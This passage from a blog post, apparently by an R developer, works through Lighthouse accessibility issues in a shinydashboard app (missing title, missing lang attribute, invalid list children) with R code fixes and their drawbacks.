&lt;li&gt;[aria-*] attributes do not match their roles (ARIA is a set of
attributes that define ways to make web content and web applications
more accessible to people with disabilities)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="the-ugly"&gt;The ugly&lt;/h3&gt;
&lt;p&gt;On the assumption I have the above app and want to stick with {shiny}
and {shinydashboard} what can I do to solve these flagged issues?&lt;/p&gt;
&lt;h4 id="document-does-not-have-a-title-element"&gt;Document does not have a &amp;lt;title&amp;gt; element&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; The page should have a &lt;code&gt;&amp;lt;title&amp;gt;My title&amp;lt;/title&amp;gt;&lt;/code&gt;
element within the &lt;code&gt;&amp;lt;head&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; The title gives users of screen readers
and other assistive technologies an overview of the page, it is the
first text that an assistive technology announces. The title is also
important for search engine users to determine whether a page is
relevant.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;title&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;My app&amp;#34;&lt;/span&gt;)), &lt;span style="color:#8b949e;font-style:italic"&gt;# modification&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can solve the title issue with &lt;code&gt;title = &amp;quot;My app&amp;quot;&lt;/code&gt; in the
&lt;code&gt;dashboardPage()&lt;/code&gt; function here, but that wouldn’t be applicable to
all cases. &lt;code&gt;tags$head(tags$title())&lt;/code&gt; will always add the title tag
to the head of the web page.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="html-element-does-not-have-a-lang-attribute"&gt;&amp;lt;html&amp;gt; element does not have a [lang] attribute&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; The &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element of the page should have an
attribute specifying the language of the content, e.g
&lt;code&gt;&amp;lt;html lang='en'&amp;gt; ... &amp;lt;/html&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; Screen readers use a different sound
library for each language they support to ensure correct
pronunciation. If a page doesn’t specify a language, a screen reader
assumes the page is in the default language that the user chose when
setting up the screen reader, often making it impossible to
understand the content.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This has been noted on
&lt;a href="https://github.com/rstudio/shiny/issues/2844" rel="external"&gt;github&lt;/a&gt; for which a
&lt;code&gt;lang&lt;/code&gt; parameter was added to &lt;code&gt;shiny::*Page()&lt;/code&gt; but doesn’t solve the
problem for our dashboard. A proposed more general fix would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;html&lt;/span&gt;(lang &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;en&amp;#34;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# modification&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;but it is also noted that local use of a lang attribute like this
should be limited to only when there is a language change, to force
screen readers to switch speech synthesizers. So this solution is
not really ideal. It is also absolutely not clear how to do this
properly. I had to inspect the file changes of the commits merged
for the above noted issue to find that when running a
&lt;code&gt;shiny::shinyApp&lt;/code&gt; the render function checks for a lang attribute.
So this issue should really be solved with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;attr&lt;/span&gt;(ui, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lang&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;en&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="lists-do-not-only-contain-li-elements-and-script-supporting-elements"&gt;Lists do not only contain &amp;lt;li&amp;gt; elements and script supporting elements&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; &lt;code&gt;&amp;lt;ul&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;ol&amp;gt;&lt;/code&gt; list elements, should only contain
&lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; list items or &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; elements within them. Here we have a
&lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element inside our &lt;code&gt;&amp;lt;ul&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; Screen readers and other assistive
technologies depend on lists being structured properly to keep users
informed of content within the lists.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is where it starts to get a bit more painful…&lt;/p&gt;
&lt;p&gt;The list elements referred to are those in the menu, and the problem
is the &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar-menu&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenuSelectedTabItem&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;null&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which is added to the html to be returned in the
&lt;code&gt;shinydashboard::sidebarMenu()&lt;/code&gt; function. As far as I can see, we
have two possible strategies here, neither of which is nice.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Manipulate the object returned by {shinydashboard}. Here we
could remove the rogue &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element pretty easily&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(x),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which, whilst removing the Lighthouse reported issue, unfortunately
gives us another, less easy to immediately see problem, which is
that the shiny input binding for the tab that is currently in view
is now broken and always returns NULL. So we rethink and come up
with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tab_input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;real_menu &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(x, tab_input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(real_menu),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which doesn’t work either. This time the input on start-up of the
application fires twice instead of once, and it’s not immediately
clear why that is the case. My imaginary application needs this
feature so we implement some hack for it and wrap it up in our own
function so that it can be reused (it’s not ideal but it works… sort
of, it definitely breaks with shiny modules though.)&lt;/p&gt;
